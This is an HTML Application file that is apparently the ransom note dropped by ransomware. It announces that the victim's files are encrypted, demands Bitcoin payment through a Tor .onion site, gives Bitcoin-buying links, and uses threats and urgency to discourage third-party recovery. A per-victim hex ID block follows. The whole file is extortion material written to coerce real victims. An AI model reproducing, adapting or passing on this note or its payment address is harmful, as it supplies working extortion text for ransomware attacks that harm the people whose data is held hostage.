<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>

<html>

  <head>

    <meta charset='windows-1251'>




    <HTA:APPLICATION

      ICON='msiexec.exe'

      SINGLEINSTANCE='yes'

      SysMenu="no">

    <style type='text/css'>



      body {

        font: 15px Tahoma, sans-serif;

        margin: 10px;

        line-height: 25px;

        background: #EDEDED;

      }



      .bold {

        font-weight: bold;

      }



      .mark {

        background: #D0D0E8;

        padding: 2px 5px;

      }



	  img {

		display:block;

		margin:auto;

	  }

      .header {

		text-align: center;

        font-size: 30px;

        line-height: 50px;

        font-weight: bold;

		margin-bottom:20px;

      }



	  

      .info {

        background: #D0D0E8;

        border-left: 10px solid #00008B;

      }

      .alert {

        background: #FFE4E4;

        border-left: 10px solid #FF0000;

      }

      .private {

        border: 1px dashed #000;

        background: #FFFFEF;

      }



      .note {

        height: auto;

        padding-bottom: 1px;

        margin: 15px 0;

      }

      .note .title {

        font-weight: bold;

        text-indent: 10px;

        height: 30px;

        line-height: 30px;

        padding-top: 10px;

      }

      .note .mark {

        background: #A2A2B5;

      }

      .note ul {

        margin-top: 0;

      }

      .note pre {

        margin-left: 15px;

        line-height: 13px;

        font-size: 13px;

      }



    </style>

  </head>



  <body>

 

    <div class='header'>

		<div>All your files have been encrypted!</div>

	</div>

   



    <div>

		You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

	</div>

	

	<div class='note info'>

      <div class='title'>Decryption as guarantee</div>

		<ul>Your documents, photos, databases and other important files have been encrypted
cryptographically strong, without the original key recovery is impossible!
To decrypt your files you need to buy the special software - "DECRYPTER"
Using another tools could corrupt your files, in case of using third party 
software we dont give guarantees that full recovery is possible so use it on 
your own risk.

If you want to restore files, go to on our site: 
1) Download TOR-Browser (https://www.torproject.org/download/download)
2) Run it
3) Go to <span class='mark'>http://cr7icbfqm64hixta.onion</span>	    </ul>

    </div>



    <div class='note info'>

      <div class='title'>How to obtain Bitcoins</div>

      <ul>

        The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 

          <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>

		  <br> Also you can find other places to buy Bitcoins and beginners guide here:

          <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a>

      </ul>

    </div>



    <div class='note alert'>

      <div class='title'>Attention!</div>

      <ul>

        <li>Wait from us for reply to your mail within 48 hours.</li>

        <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li>

        <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li>

        </ul>

    </div>



    <div class='note info'>

      <div class="note private">
      <div class="title">Your personal ID</div>
      <pre>09 DB 9F 21 83 E4 79 3B F4 7A 47 13 46 37 00 28
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 ..
00    ..
00       ..
00          ..
00 
00 
00 
00 
00 
00 
00 
00 
00 
00                                           ..
</pre><!-- !!! Строку не менять !!! -->
    </div>

  </body>

</html>
